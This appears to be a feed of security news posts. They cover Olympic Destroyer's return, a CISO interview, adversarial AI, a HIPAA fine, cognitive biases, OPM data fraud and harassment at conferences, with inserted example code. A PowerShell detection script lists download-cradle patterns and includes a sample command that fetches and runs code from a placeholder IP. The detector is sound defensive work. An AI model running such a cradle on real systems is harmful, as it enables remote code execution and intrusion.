Kaspersky Lab researchers tracking the Olympic Destroyer threat that famously struck the opening of the Winter Olympic Games in Pyeongchang with a destructive network worm have discovered that the hacking group behind it is still active. It appears to be targeting Germany, France, Switzerland, the Netherlands, Ukraine and Russia, with a focus on organisations involved in protection against chemical and biological threats.


Olympic Destroyer is an advanced threat that hit organisers, suppliers and partners of the Winter Olympic Games 2018 in Pyeongchang, South Korea, with a cybersabotage operation based on a destructive network worm. Many indicators pointed in different directions for the origins of the attack, causing some confusion in the info-security industry in February 2018. A few rare and sophisticated signs discovered by Kaspersky Lab suggested that Lazarus group, a North Korea-linked threat actor, was behind the operation. However, in March, the company confirmed that the campaign featured an elaborate and convincing false flag operation, and Lazarus was unlikely to be the source. Researchers have now found the Olympic Destroyer operation is back in action, using some of its original infiltration and reconnaissance toolset, and focusing on targets in Europe.


The threat actor is spreading its malware through spear-phishing documents that closely resemble the weaponized documents used in preparation for the Winter Olympics operation. One such decoy document referred to the ‘Spiez Convergence’, a bio-chemical threats conference held in Switzerland and organised by the Spiez Laboratory, an organisation that played a key role in the Salisbury attack investigation. Another document was targeting an entity of the health and veterinary control authority of Ukraine. Some of the spear-phishing documents uncovered by researchers carry words in Russian and German.


All final payloads extracted from the malicious documents were designed to provide generic access to the compromised computers. A free, open-source post-exploitation framework, widely known as PowerShell Empire, was used for the second stage of the attack.


The attackers appear to use compromised legitimate web servers to host and control the malware. These servers run a popular open-source content management system (CMS) called Joomla. The researchers found that one of the servers hosting the malicious payload ran a version of Joomla (v1.7.3) released in November 2011, which suggests that the attackers may have compromised the servers through a badly outdated CMS.
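Whatever the second-stage framework, the endpoint observable for the delivery chain described above is generic: an Office application spawning PowerShell with hidden, encoded or download-cradle arguments. The script below is an added example, not Kaspersky Lab’s detection logic; it scores process-creation events using the field names of Sysmon Event ID 1, and the sample events, file paths and the 198.51.100.7 address are all constructed.

```python
"""Flag Office applications launching PowerShell with suspicious arguments.

Added example; not Kaspersky Lab's detection logic. Field names follow Sysmon
Event ID 1 (process creation); the sample events, paths and the 198.51.100.7
address are constructed.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ALERT_THRESHOLD = 5

# (regex over the command line, weight, label); patterns are case-insensitive
SUSPICIOUS_ARGS = [
    (r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\b", 3, "encoded command"),
    (r"(?i)(^|\s)-(w|win|windowstyle)\s+(hidden|1)\b", 2, "hidden window"),
    (r"(?i)(^|\s)-(nop|noprofile)\b", 1, "no profile"),
    (r"(?i)(^|\s)-(noni|noninteractive)\b", 1, "non-interactive"),
    (r"(?i)(^|\s)-(ep|exec|executionpolicy)\s+bypass\b", 2, "execution policy bypass"),
    (r"(?i)\b(iex|invoke-expression)\b", 2, "invoke-expression"),
    (r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b)", 3, "download cradle"),
]


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(evt: dict):
    """Score one process-creation event. Returns (score, reasons)."""
    image = basename(evt.get("Image", ""))
    if image not in SHELLS:
        return 0, []
    parent = basename(evt.get("ParentImage", ""))
    cmd = evt.get("CommandLine", "")
    score, reasons = 0, []
    if parent in OFFICE_APPS:
        score += 5
        reasons.append(f"PowerShell spawned by Office application {parent}")
    for pattern, weight, label in SUSPICIOUS_ARGS:
        if re.search(pattern, cmd):
            score += weight
            reasons.append(label)
    return score, reasons


def find_alerts(events):
    """Return (index, score, reasons) for every event at or above the threshold."""
    out = []
    for i, evt in enumerate(events):
        score, reasons = score_event(evt)
        if score >= ALERT_THRESHOLD:
            out.append((i, score, reasons))
    return out


# Constructed sample events (Sysmon Event ID 1 field names); the base64 is a placeholder
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"WINWORD.EXE /n C:\Users\user\Downloads\agenda.docx"},
]

if __name__ == "__main__":
    for idx, score, reasons in find_alerts(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {', '.join(reasons)}")
```

The weighting matters as much as the patterns: an administrator’s `-ExecutionPolicy Bypass -File` launched from `cmd.exe` scores below the threshold, while any PowerShell child of an Office process starts at 5 and is tipped over by a single encoded or hidden-window flag. Tune the weights against your own baseline of legitimate Office-to-PowerShell activity (some add-ins do spawn it) before alerting on this in production.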


Based on Kaspersky Lab telemetry and files uploaded to multi-scanner services, the interests of this Olympic Destroyer campaign appear to have been entities in Germany, France, Switzerland, the Netherlands, Ukraine and Russia.


“The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever and showed how easy it is to make a mistake with only fragments of the picture that are visible to researchers. The analysis and deterrence of these threats should be based on cooperation between the private sector and governments across national borders. We hope that by sharing our findings publicly, incident responders and security researchers will be better placed to recognise and mitigate such an attack at any stage in the future,” said Vitaly Kamluk, security researcher in Kaspersky Lab’s GReAT team.

In the previous attack, during the Winter Olympic Games, the beginning of the reconnaissance stage was a couple of months before the epidemic of the self-modifying destructive network worm. It is highly possible that Olympic Destroyer is preparing a similar attack with new motives. That is why we advise biological and chemical threat research entities to stay on high alert and launch an out-of-schedule security audit where possible.

The post Olympic Destroyer is back, targeting chemical, biological and nuclear threat protection entities in Europe appeared first on IT SECURITY GURU.

Global IoT tech spending to reach $1.2 trillion in 2022

IDC forecasts IoT spending will experience a compound annual growth rate (CAGR) of 13.6% over the 2017-2022 forecast period and reach $1.2 trillion in 2022. The forecast is based on the latest research in the burgeoning IoT technology market, which offers business investment opportunities across a spectrum of industries and illuminated through use case implementations. As the diverse IoT market reaches broad-based critical mass, innovative offerings in analytics software, cloud technologies, and business and IT …

The post Global IoT tech spending to reach $1.2 trillion in 2022 appeared first on Help Net Security.

CISO Chat – Allan Alford, CISO at Forcepoint

Ever wondered what the role of a Chief Information Security Officer (CISO) encompasses? To put it simply, they are the guardians and protectors of everything information security related to a business. However, the tasks are far from simple, as their teams work around the clock to respond to incidents that directly affect the safety of the company and its data. As the issues in cyber have evolved, so too has the role of the CISO, which now also involves advising boardroom-level executives about the multitude of potential risks that threaten their business and being prepared for an eventual attack.

To get a better understanding of the life of a CISO, the IT Security Guru will chat to leading CISOs to get their thoughts and ideas on the 2018 cyber landscape, covering advice, guidance and the problems they face. We will leave the favourite food and hobby questions for another time.

On the back of what was a fantastic first round of questioning with insightful responses from leading figures in the IT security industry, the CISO Chat segment on the IT Security Guru has returned for the second round of questioning.

Allan Alford, CISO at Forcepoint, was next to give his expert opinion.


With the development of Blockchain technology, what industries do you think will benefit most from its introduction and why?

Blockchain is essentially a decentralised encryption schema with an eye towards encrypting an ever-growing data stream. This technology underpins the transaction ledgers used by most cryptocurrencies, but it’s not the only use of blockchains. Many people tend to confuse blockchains and digital currencies. That’s a mistake, as it’s a bit like confusing a cog with a watch: most watches contain cogs, but they are not the same thing.

With cryptocurrencies and other trust-based asset tracking systems based upon blockchain technology, I can see any industry requiring a foundational trust mechanism for digital transactions benefiting from the technology. Those introducing smart contracts, or transferred ownership of valuable assets – think legal contracts for property, or even jewel ownership – where trust in the authenticity of the transaction is critical – can use blockchain.

Blockchains provide a shared, immutable ledger that solves what we call the “double spending” problem. For example, with cryptocurrency without some protections there’s nothing to stop an attacker from copying a crypto-coin and spending it with you and also with someone else.

At the end of 2017 we made a prediction focused on cryptocurrencies, however our concern centered around the systems which support cryptocurrencies or other trusted transactions and the ways those systems could be manipulated for criminal gain.

As the aforementioned data stream continues to grow, applications for this technology could exist that have not yet been explored. Any field of technology where the final product grows through organic accretion could leverage blockchain for its security interests. Despite the unquestionable promise of blockchaining as a basis for multiparty trust, the overall value in any particular application is limited by the systemic risk. Even when the blockchain itself works perfectly, the underlying value is – or should be – capped by the end-to-end strength.
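The double-spending rule mentioned in the answer above is easy to state and worth seeing enforced. The following is an added example, not code from the interview or from any cryptocurrency project: a single-node, append-only ledger in which each transaction consumes existing coins by id and creates new ones, a consumed coin can never be consumed again, and blocks are chained by SHA-256 so that rewriting history breaks every later hash. It shows the ledger rules only, not the multi-party consensus that lets a real blockchain be trusted without a central operator, and ownership is checked by name rather than by signature. Coin ids and participant names are made up.

```python
"""Toy append-only ledger that rejects double spends.

Added example, not code from the interview or from any cryptocurrency
project. Single node, no consensus, ownership checked by name instead of by
signature. Coin ids and participant names are made up.
"""
import hashlib
import json

GENESIS_PREV = "0" * 64


class Ledger:
    def __init__(self, genesis_coins: dict):
        self.unspent = dict(genesis_coins)      # coin id -> owner
        self.spent = set()                      # coin ids that have been consumed
        self.chain = [self._make_block([], GENESIS_PREV)]

    @staticmethod
    def _make_block(txs, prev_hash):
        """Hash the previous block's hash together with the transactions."""
        body = json.dumps({"prev": prev_hash, "txs": txs}, sort_keys=True)
        return {"prev": prev_hash, "txs": txs,
                "hash": hashlib.sha256(body.encode()).hexdigest()}

    def validate(self, tx):
        """Check a transaction against current state. Returns (ok, reason)."""
        for cid in tx["inputs"]:
            if cid in self.spent:
                return False, f"double spend: coin {cid} was already consumed"
            if cid not in self.unspent:
                return False, f"unknown coin {cid}"
            if self.unspent[cid] != tx["from"]:
                return False, f"{tx['from']} does not own coin {cid}"
        for cid in tx["outputs"]:
            if cid in self.unspent or cid in self.spent:
                return False, f"coin id {cid} already exists"
        return True, "ok"

    def apply(self, tx):
        """Validate a transaction and, if valid, append it in a new block."""
        ok, reason = self.validate(tx)
        if not ok:
            return False, reason
        for cid in tx["inputs"]:
            del self.unspent[cid]
            self.spent.add(cid)
        self.unspent.update(tx["outputs"])
        self.chain.append(self._make_block([tx], self.chain[-1]["hash"]))
        return True, "accepted"

    def verify_chain(self) -> bool:
        """Recompute every block hash and check each block points at its predecessor."""
        prev = GENESIS_PREV
        for block in self.chain:
            if block["prev"] != prev:
                return False
            if self._make_block(block["txs"], prev)["hash"] != block["hash"]:
                return False
            prev = block["hash"]
        return True


def demo():
    """Run the double-spend and tamper scenarios; returns the observed outcomes."""
    ledger = Ledger({"coin-1": "alice"})
    first = ledger.apply({"from": "alice", "inputs": ["coin-1"], "outputs": {"coin-2": "bob"}})
    # Alice tries to spend the same coin again with a different recipient
    second = ledger.apply({"from": "alice", "inputs": ["coin-1"], "outputs": {"coin-3": "carol"}})
    intact = ledger.verify_chain()
    # Someone edits history to redirect the payment; the hash chain no longer verifies
    ledger.chain[1]["txs"][0]["outputs"]["coin-2"] = "mallory"
    return first, second, intact, ledger.verify_chain()


if __name__ == "__main__":
    print(demo())
```

The `spent` set is the whole of the double-spend defence on one node; what a distributed blockchain adds is agreement among many nodes on the order of blocks, so that no single party can present two conflicting histories to two counterparties, which is the attack the answer describes.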


At RSA 2018, Facebook, Microsoft and 32 other technology and cybersecurity organisations formed a cyber consortium with the objective to work together and increase cybersecurity awareness. How beneficial do you see this move and should it be open for others to join?

I would welcome any initiative which increases cybersecurity awareness. Despite growing investments in defensive technologies, cyber breaches continue to proliferate. The threat landscape becomes even more complex as perimeters effectively evaporate thanks to ever-increasing systems (e.g., cloud, mobile) over which an enterprise has limited, if any, control.

The one thing I think enterprises must do in order to improve their cybersecurity posture is become increasingly aware of who is accessing their data, and invest in systems such as risk-adaptive protection that spot unusual activities on the network. This way you can prevent the wrong people from accessing and exploiting your personal information.

Looking at today’s security landscape, it’s clear: The time has come for vendors and security professionals to shift paradigms – from an “outside-in,” technology-led approach to an “inside-out,” people focused approach, which is better suited to the new era of mobility and cloud. It really comes down to businesses understanding the rhythm of the people as they interact with the associated flow of their data.


Security should be a top priority for any business. How true is this statement and do you believe organisations treat it as such?

Cybersecurity is a global, high profile challenge and I do believe that it is a top priority, and being treated as such. The perception of security has changed: it’s no longer a box-ticking compliance exercise, but is now fundamental to the successful running of a business. The risks are so high. This has changed both the landscape and the perception of the security industry, for example opening up the career ladder for security professionals in a range of roles.


To give people insight, what are the most rewarding and challenging aspects of the CISO position and how do you think it has evolved over the past couple of years?

I think ‘bring your own device’ (BYOD) and SaaS have combined to really destroy any notions we’ve had about the boundaries of our data jurisdiction. Facing that reality was not easy at first. Tackling that problem head-on has been an adventure. Traditional network tools aren’t enough, and even solutions such as DLP and CASB don’t work well unless they can talk to each other. I’m currently overseeing a revolution of sorts in my shop where we are tying UEBA analytics to DLP (and later CASB) that will transform how we address this dissolution of jurisdiction.


If you have one gripe about the cybersecurity industry what is it and how would you address it?

We have been threat-centric and network-centric, and in fact we believe we need to be human-centric. Our Chief Scientist offers an interesting analogy: it’s as if the industry has built security systems like a six-fingered glove, and then required that the user grow another finger to fit. Rather, we should be designing security systems that work around the person.

We can become responsible custodians and stewards of our data: both as individuals and as cybersecurity professionals. The last two years have seen the steady erosion of the clean line between the personal and public sphere – even ISPs have the legal right to sell customer data. Furthermore, continued geopolitical uncertainty, and threats both foreign and domestic, have continued to highlight the perceived tension between individual rights and security for all.

Back in November we made a prediction based upon what we saw as the perfect storm between the following four drivers: legal, technological, societal and political. We said the confluence of these factors will cause a tectonic shift in the privacy landscape: and it has.

Finally, GDPR came into force on Friday 25th May. While some companies will see the new regulation as something of a headache as they work to get their data management procedures in order, the threat of serious sanctions for those failing to comply gives a new perspective on the importance of data security. Those who want to see the bright side of this situation will view the upcoming regulation as a chance to get their data in order.

If you don’t have a gripe, what positive things in the cybersecurity industry have you seen over the past 12 months that has given you optimism for the future?

The recent privacy debate has sharpened everyone’s focus. We are going to see a closer focus on how much data is gathered and where and how long it is stored for. Data breaches or loss of intellectual property cause financial and reputational impact (damaging trust still further) and can result in litigation or even product withdrawal. This is a topic businesses are now taking much more seriously.

The good news is that security and privacy don’t have to be at odds with each other. Protection of companies as well as its employees, vendors and partners, can be performed without violation of privacy if a risk-adaptive view of security is kept in mind. Protecting data means protecting ALL data – both personal and corporate. Risk-adaptive means the rapid ability to uncover when a user’s credentials have been compromised, a situation that has negative impact for both the employer and the employee.

In your opinion, how should the effectiveness of a cybersecurity program be measured?

Any measurement that does not speak in terms of the enterprise’s outcomes lacks value. I say ‘enterprise’ instead of ‘business’ because a government agency, for example, should also measure the efficacy of its cyber program in terms of how cyber positively impacts the agency’s core mission, without hampering its ability to fulfil that mission. Did you protect the critical data of the enterprise? Did you stop the bad thing from happening while freeing the good things to happen? Did you minimise both the count and duration of breaches and incidents? Did you do all this without saying “No!” to your stakeholders? These should be the goals of a good program.



The post CISO Chat – Allan Alford, CISO at Forcepoint appeared first on IT SECURITY GURU.

Humans vs. Machines: Will Adversarial AI Become the Better Hacker?

Humans versus machines: Who’s the better hacker? The advent of artificial intelligence (AI) brought with it a new set of attacks using adversarial AI, and this influx suggests the answer is likely machine.

With each innovation in technology comes the reality that attackers who study the security tools will find ways to exploit them. AI can make a phone number look like it’s coming from your home area code — and trick your firewall like a machine learning Trojan horse.

How can organizations fight an unknown enemy that’s not even human?

Humans vs. Machines: The Problem for Security

When cybersecurity company ZeroFOX asked whether humans or machines were better hackers back in 2016, they took to Twitter with an automated end-to-end (E2E) spear phishing attack. The results? According to their experiment, machines are much more effective at getting humans to click on malicious links.

AI models are built with a type of machine learning called deep neural networks (DNNs), which are loosely modelled on the neurons of the human brain. DNNs make the machine capable of mimicking human behaviours like decision-making, reasoning and problem-solving.

When researchers and developers train a model on images, they want it to recognise an object, such as a cup, stop sign or cat. They can also use machine learning to generate data that mimics real data, and each iteration of the model brings that generated image closer to the real object. Now, imagine those pictures in medical imaging: the power of AI offers massive benefits when it comes to analysing images.

So, what’s the problem for security? “Adversarial examples are (say, images) which have deliberately been modified to produce a desired response by a DNN,” according to IBM Research – Ireland.

The differences between the real and the fabricated are too small for the human eye to catch. A trained DNN, however, does respond to those differences and may classify the image as something altogether different — which is exactly what the attacker wants.
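The mechanism just described can be shown on the smallest model that has a decision boundary. The following is an added example; it is not code from IBM Research, from the article or from the Adversarial Robustness Toolbox. It uses a constructed four-pixel logistic-regression classifier: because the gradient of a linear model’s output with respect to its input is simply the weight vector, the smallest per-pixel change that flips the label can be computed exactly, and the same quantity averaged over a sample set is the kind of robustness figure a toolkit estimates numerically for a network. The weights, bias and “images” are assumptions.

```python
"""Minimal adversarial example and robustness measurement on a linear classifier.

Added example; not code from IBM Research, the article or the Adversarial
Robustness Toolbox. The weights, bias and "images" below are constructed.
"""
import math

# Assumed model: logistic regression over four pixel intensities in [0, 1].
# logit > 0 means class 1 ("stop sign"), otherwise class 0 ("not a stop sign").
W = [0.9, -0.4, 0.7, 0.2]
B = -0.3


def logit(x):
    return sum(w * xi for w, xi in zip(W, x)) + B


def predict(x):
    return 1 if logit(x) > 0 else 0


def confidence(x):
    """Sigmoid of the logit: the model's probability for class 1."""
    return 1.0 / (1.0 + math.exp(-logit(x)))


def fgsm(x, eps):
    """Fast-gradient-sign step of size eps (L-infinity) toward the opposite class.

    The gradient of the logit with respect to the input is W, so each pixel moves
    by eps against sign(W) for a class-1 input (to lower the logit) or along
    sign(W) for a class-0 input. Pixels are clipped back into [0, 1].
    """
    direction = -1.0 if predict(x) == 1 else 1.0
    return [min(1.0, max(0.0, xi + direction * eps * math.copysign(1.0, w)))
            for xi, w in zip(x, W)]


def min_flip_eps(x):
    """Smallest L-infinity budget that flips the label of this linear model.

    Moving every pixel by eps against sign(W) changes the logit by eps * ||W||_1,
    so the label flips once eps exceeds |logit(x)| / ||W||_1 (assuming the step
    stays inside [0, 1] and is not clipped).
    """
    return abs(logit(x)) / sum(abs(w) for w in W)


def linf_distance(a, b):
    """Largest per-pixel change between two inputs."""
    return max(abs(ai - bi) for ai, bi in zip(a, b))


def robustness(samples):
    """Average minimal perturbation over a sample set (higher is harder to fool);
    this is the kind of number a robustness toolkit reports for a model."""
    return sum(min_flip_eps(x) for x in samples) / len(samples)


# Constructed inputs: one the model calls a stop sign, one it does not
STOP_SIGN = [0.8, 0.3, 0.6, 0.5]
NOT_STOP = [0.2, 0.9, 0.1, 0.3]

if __name__ == "__main__":
    for x in (STOP_SIGN, NOT_STOP):
        eps = min_flip_eps(x)
        adv = fgsm(x, eps * 1.05)
        print(f"class {predict(x)} -> {predict(adv)} with max per-pixel change "
              f"{linf_distance(x, adv):.3f} (confidence {confidence(x):.2f} -> {confidence(adv):.2f})")
```

With four pixels the flip costs a visible 0.37 per pixel, which looks like a weak attack. The budget scales as |logit| / ||gradient||_1, and a real image model has tens of thousands of inputs contributing to that L1 norm, which is why the change per pixel in a DNN attack drops below what a human notices; the defensive use of the same arithmetic is to report the average minimal perturbation as the model’s robustness score and to track it as training or input filtering changes.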

An Adversarial AI Arms Race

As the amount of data increases, nefarious actors will become more efficient at deploying new types of attacks by leveraging adversarial AI. This tactic will make attack attribution even more challenging.

“Adversaries will increase their use of machine learning to create attacks, experiment with combinations of machine learning and AI and expand their efforts to discover and disrupt the machine learning models used by defenders,” according to a 2018 cybercrime report. Enterprises must essentially prepare for an adversarial arms race.

Attacks will also become more affordable, according to the report — an additional bonus for attackers. An attacker can use an AI system to perform functions that would be virtually impossible for humans given the brain power and technical expertise required to achieve at scale.

Rage Against the Machine

What’s different about adversarial AI attacks? They can carry out the same malicious actions with far greater speed and depth. While AI is not yet a fully accessible tool for cybercriminals, its weaponisation is quickly becoming more widespread. These threats can multiply the variations of an attack, vector or payload and increase the volume of attacks. But beyond speed and scale, the attacks are fundamentally quite similar to current threat tactics.

So, how can organizations defend themselves? IBM recently released the Adversarial Robustness Toolbox to help defend DNNs against weaponized AI attacks, allowing researchers and developers to measure the robustness of their DNN models. This, in turn, will improve AI systems.

Sharing intelligence information with the cybersecurity community is also important in building strong defenses. The solution to adversarial AI will come from a combination of technology and policy, but all hands must be on deck. The risks threaten all sectors across public and private institutions. Coordinated efforts among key stakeholders will help to build a more secure future.

After all, the union of man and machine has the power to give defenders a leg up.

Visit the Adversarial Robustness Toolbox and contribute to IBM’s ongoing research into adversarial AI attacks.

The post Humans vs. Machines: Will Adversarial AI Become the Better Hacker? appeared first on Security Intelligence.

Cancer Center Fined $4.3M for HIPAA Violations Involving Data Breaches

A cancer center received an order to pay $4.3 million in a settlement for HIPAA violations that involved multiple data breaches. On 18 June, the United States Department of Health and Human Services (HHS) announced in a press release that one of its Administrative Law Judges (ALJs) ruled in favor of its Office for Civil Rights […]

The post Cancer Center Fined $4.3M for HIPAA Violations Involving Data Breaches appeared first on The State of Security.

How to Overcome Cognitive Biases That Threaten Data Security

Did you know the software that powers our brains contains security flaws that need to be patched? I’m talking about cognitive biases, which are the wetware vulnerabilities that collectively constitute the single greatest threat to enterprise data security.

The Interaction Design Foundation defines cognitive bias as “an umbrella term that refers to the systematic ways in which the context and framing of information influence individuals’ judgment and decision-making.”

In other words? A cognitive bias is simply a logical error in thinking that’s as human as the enjoyment of cupcakes and rainbows. Yes, people are irrational, but irrationality is a generality. Cognitive biases, on the other hand, are specific and defined.

Cognitive Biases Put Data Security at Risk

Don’t confuse cognitive biases (which describe thought processes) with logical fallacies (which describe flaws in arguments during communication). The former is about thoughts, and the latter is about words. This is significant because cognitive bias is one of the biggest reasons why enterprise data can be made insecure. In fact, these logical errors are a significant reason why 27 percent of employees fail social engineering tests.

Social engineering is nothing more than a systematic exploitation of human cognitive biases. Successful phishing attackers, for example, know how to use cognitive biases to convince recipients to voluntarily open links that they wouldn’t click if their actions were based on perfect logic.

Here’s another example of how cognitive biases can compromise security: Let’s say a member of an organization’s computer security incident response team (CSIRT) is confronted with a new breach. Considering a list of possible causes, someone with an anchoring bias might fixate on the first possibility considered instead of the most likely one. Another person with the availability heuristic cognitive bias might consider only potential sources that happen to come to mind — rather than taking a systematic approach that considers all possibilities. Another person suffering from the Dunning-Kruger effect, a cognitive bias that causes a subject to overestimate his or her abilities, might choose to investigate and solve the issue alone rather than bringing in colleagues, consultants or specialists.

In each of these cases, the responder fails to approach the problem systematically and with reason. Instead, he or she allows cognitive biases to muddle the process — creating unnecessary cost, consuming too much time and introducing potential risk.

Given the rapidly increasing volume and frequency of cyberthreats, it’s more important than ever to address cognitive bias head-on. Investing in the right incident response platform (IRP) can go a long way toward eliminating cognitive bias-driven decision-making.

Logical Flaws Lead to Security Lapses

I’ve learned to watch out for attentional bias as a writer, which is where perception is shaped by one’s recurring thoughts. This bias, for example, can become a security risk when it comes to writing and interpreting technical documentation related to software or hardware features.

Creators of documentation must first become extremely familiar with the issues, technologies, processes and methods they’re documenting. Because these factors are top of mind, descriptions might gloss over or omit contextual cues for readers who have a different set of ideas in mind or are less familiar with the issues at hand. In other words: What seems obvious to the writer might be a source of confusion for the reader — with neither party able to relate to the other’s point of view.

The 2018 RSA Survey of 155 IT professionals at the RSA Conference in May found that 26 percent of companies ignore security bugs because they believe they don’t have time to fix them. The problem, however, is that dealing with the consequences of unfixed bugs tends to take longer than implementing the fix in the first place would have.

This could be the result of a cognitive bias called hyperbolic discounting, where choices that benefit the present self are given priority over those that benefit the future self. In this context, the benefits of ignoring a bug now are given more weight than the cost of dealing with the problem later.

The survey also revealed that IT professionals deliberately ignore security holes for other reasons, including a lack of knowledge about how to proceed. This choice could be driven by the ambiguity effect, a cognitive bias in which options whose outcomes are unknown are avoided. Because the path to troubleshooting a problem is unclear, that path is rejected.

Finally, less than half of the organizations surveyed said they patch vulnerabilities as soon as they’re known. Eight percent of respondents even reported that they apply patches just once or twice per year. This is good, old-fashioned procrastination — which, of course, is also a cognitive bias.

Understanding Biases to Reduce Human Error

Awareness about specific cognitive biases must be a core part of every security training exercise. The first step toward overcoming cognitive biases is for everyone to understand that they exist, they’re pervasive and they have a negative impact on data security. Cognitive biases are also the reason for best practices, which embody institutional learning and lessons that reduce reliance on individual thought processes.

Most importantly, security professionals must overcome the biases that enable biases. At many organizations, security specialists fail to understand the perspective of less technical users. This lack of understanding is a cognitive bias called the curse of knowledge, and it can result in false assumptions and poor communication.

But the mother of all cognitive biases is that only other people have cognitive biases. This belief is called the bias blind spot. The truth is that cognitive biases are just part of being human. I have them, you have them — and nobody is immune.

It’s important for security leaders to base their decision-making on this inescapable fact and to frequently patch the wetware bug that constitutes the biggest threat to their organization’s security.

The post How to Overcome Cognitive Biases That Threaten Data Security appeared first on Security Intelligence.

Fraudster caught using OPM hack data from 2015

Way back in 2015, the US Office of Personnel Management (OPM) was electronically burgled, with hackers making off with 21.5 million records. That data included social security numbers, fingerprints, usernames, passwords and data from interviews conducted for background checks. Now, a woman from Maryland has admitted to using data from that breach to secure fraudulent loans through a credit union.

Via: Reuters

Source: Department of Justice

Can #MeToo Change the Toxic Culture of Sexism and Harassment at Cybersecurity Conferences?

Camille Tuutti can’t remember all the times she’s been harassed. A prominent information technology journalist and editor, Tuutti feels that her friendly and outgoing personality — a necessity in her line of work — has often been misinterpreted by men in her field as an invitation for inappropriate behavior, especially at top cybersecurity conferences, where binge drinking is encouraged. Drunk men have often put their arms around her and her colleagues. She has been asked out “a million times.” Someone tried to kiss her the first time she met him.

This April, at RSA, a leading cybersecurity conference held in San Francisco, she was walking the showroom with a male colleague when a male stranger asked her what she was wearing to bed. She noticed, too, that vendors at the show assumed that she didn’t know what she was talking about and that her colleague did. And despite organizers’ previous attempts to implement a dress code, many of the booths featured “booth babes” — scantily clad models hired to attract men to vendors’ wares. “It was so tone-deaf, especially in 2018 and especially in the wake of #MeToo,” Tuutti said.

The casual sexism Tuutti encountered at RSA is not atypical of big-league hacker and cybersecurity conferences. While there are no precise statistics available about harassment at these events, anecdotal reports like Tuutti’s have been widespread and documented for years.

The Intercept spoke to nearly two dozen women across the industry who recounted experiences ranging from uncomfortable to traumatic at conferences such as Def Con and Black Hat, held each year in Las Vegas, and RSA, held worldwide. The women who spoke to The Intercept had encountered a variety of offenses, from suggestive commentary and drunken come-ons to groping and assault. Some of the women, among whom are renowned journalists, CEOs, diversity advocates, and hackers, said that even if their own status had shielded them from some of the worst behavior, they had all heard troubling stories from younger colleagues, peers, and friends.


Troubling new stories surface every conference season, said Kasha Gauthier, director in residence for Community Engagement at the Advanced Cyber Security Center, and yet little seems to change. Gauthier and others see the harassment at conferences as part of a systemic problem in the field of cybersecurity. “To me, it’s just even more of what I see in a boardroom,” she said.

“I know many women who have attended Def Con and have experienced some form of harassment,” said Chenxi Wang, a leading expert in cybersecurity. “A lot of women will tell you, ‘I just brush it off and do my own thing.’ That’s fine. But the question is, should we put young women through that? Should we tell them, ‘Oh just toughen up, this is the industry?’”

Even within the field of technology, which is known for its gender bias, cybersecurity remains a particularly striking example. At companies like Google and Facebook, women make up about 30 percent of employees — and there are notably fewer of them the higher up the ranks one goes. Cybersecurity is much worse. According to the widely cited Global Information Security Workforce study, women compose around 11 percent of the industry and, at every level, earn less than their male peers. More than half of women working in cybersecurity have reported discrimination.

The major cybersecurity conferences are more than just massive parties and prankish sideshows. The events are crucial for networking, talking to recruiters, and learning new skills. Sometimes conference presentations become news events themselves. In 2015, hackers at Def Con demonstrated that they could remotely take control of a Chrysler Jeep’s transmissions, leading the company to recall 1.4 million vehicles. Last year, the conference’s report from its Voting Machine Hacking Village sparked a national dialogue on the security vulnerabilities of electronic voting.

As the leading gatherings for key speakers and cutting-edge products, conferences set the tone for what the field can and should look like. All-male lineups of keynote speakers — which have recently been termed “manels,” rather than panels, on social media — are still a frequent occurrence, as they were this year at the RSA Conference. And even as event organizers claim that they are taking steps to address sexism and harassment, many women still perceive a general indifference to their complaints, which they say sends a message about what kind of behavior is considered appropriate.

“When it comes to conference season in Vegas, there’s all of this folklore about getting hurt and that people shouldn’t come,” said Jessy Irwin, head of security at Tendermint, a blockchain tech company. Irwin said she always goes to conferences with a pack of women and makes a point of ensuring that those who are new to the industry aren’t traveling alone.

In the months since #MeToo took off, women’s whispers about sexual harassment and abuse have been transformed into vocal demands for systemic change — in some cases, with material consequences. Not long before #MeToo began, so-called cybersecurity rock stars Jacob Appelbaum, a former developer at the Tor Project and WikiLeaks collaborator, and Morgan Marquis-Boire, a cybersecurity expert, were asked to resign from leadership positions following multiple allegations of sexual misconduct and rape. (Appelbaum has denied the allegations against him. Marquis-Boire admitted to rape and assault of multiple women in private messages with an acquaintance. Marquis-Boire was the director of security for First Look Media, The Intercept’s parent company, and sometimes a contributor at The Intercept. He left the company for unrelated reasons before the allegations against him came to light.)

Some women are hopeful that the growing legitimation of women’s experiences may pressure conference organizers to take more pointed and effective steps to address abusive behavior at their events. “I think people are more vocal after #MeToo and feel more inclined to speak up and speak out if they or somebody they know are experiencing harassment,” Wang noted.

